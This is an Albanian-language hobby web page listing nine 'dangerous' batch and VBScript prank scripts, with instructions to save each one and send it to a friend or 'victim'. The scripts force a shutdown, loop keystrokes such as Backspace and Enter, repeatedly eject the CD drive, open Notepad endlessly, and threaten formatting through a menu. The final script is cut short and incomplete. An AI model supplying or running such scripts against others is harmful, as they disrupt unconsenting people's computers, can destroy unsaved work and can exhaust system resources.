Miresevini
  9 skripa te rrezikshem
 

Te gjitha kto komanda duhet te shkruhen ne notepad .


1). Nje mesazh i vogel dhe Shymbja e PC-s te shokut tuaj :
@echo off

msg * Nuk te dua ty

shutdown -c "Gabim je shume i marrë" -s


Ruane si diqka.bat edhe dergojani shokut .


2).Mbyllja Caps Look shokut tuaj :
Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop


Ruane si diqka.VBS dhe dergone te viktima .


3).Qeljani shokut tuaj Cd drive :Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop


Ruane si diqka.VBS edhe dergone .


4). Frikesojeni me ket script duke i u shtypur enter njeheresh qdo sekond shokut tuaj :
Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "~(enter)"

loop


Ruane si diqka.VBS dhe dergone .


5). Hapne notepadin dhe shkruane Tungjatjeta si jeni ju . ky script eshte shume i ngadalshem dhe do ta frikesoje :WScript.Sleep 180000

WScript.Sleep 10000

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad"

WScript.Sleep 100

WshShell.AppActivate "Notepad"

WScript.Sleep 500

WshShell.SendKeys "Tung"

WScript.Sleep 500

WshShell.SendKeys "gja "

WScript.Sleep 500

WshShell.SendKeys ", tje"

WScript.Sleep 500

WshShell.SendKeys "ta"

WScript.Sleep 500

WshShell.SendKeys "si "

WScript.Sleep 500

WshShell.SendKeys "je"

WScript.Sleep 500

WshShell.SendKeys "n"

WScript.Sleep 500

WshShell.SendKeys "i"

WScript.Sleep 500

WshShell.SendKeys "ju"

WScript.Sleep 500

WshShell.SendKeys "mire"

WScript.Sleep 500

WshShell.SendKeys " po"

WScript.Sleep 500

WshShell.SendKeys "ti"

WScript.Sleep 500

WshShell.SendKeys "? "


Ruane si diqka.VBS edhe dergone .


6.) Ky script vazhdimisht e shtin ne funksion butonin backspace ( per te fshire ) :MsgBox "Let's go back a few steps"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop


Ruane si diqka.VBS dhe dergojani shokut tuaj .


7). Ky script do te shkruaje ne PC-n e shokut tend vazhdimisht "TI JE BUDALLA" :Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "Ti je budalla."

loop


Ruane si diqka.VBS edhe dergone .


8). Hapet Vazhdimisht Notepadi ne pc-n e shokut tuaj :
@ECHO off

:top

START %SystemRoot%system32notepad.exe

GOTO top


Ruane si diqka.bat dhe dergojani .


9).Frika me e madhe , ky script e vet shokun tuaj me zgjedh nje opcion pre 1 deri ne 5 , opcionet kan kto akcione :


1: Shymbje

2: Restart

3: E fshin hardwerin tend .

4: Net send

5: Mesazh pastaj shymbje :
@echo off

title The end of the world

cd C:

:menu

cls

echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...

pause

echo **** your poison:

echo 1. Die this way (Wimp)

echo 2. Die this way (WIMP!)

echo 3. DO NOT DIE THIS WAY

echo 4. Die this way (you're boring)

echo 5. Easy way out

set input=nothing

set /p input=Choice:

if %input%==1 goto one

if %input%==2 goto two


Ruane si diqka.bat dhe dergone .

 
  Sot kemi 6 visitors.Ju faleminderit qe e keni vizituar kete webfaqe  
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free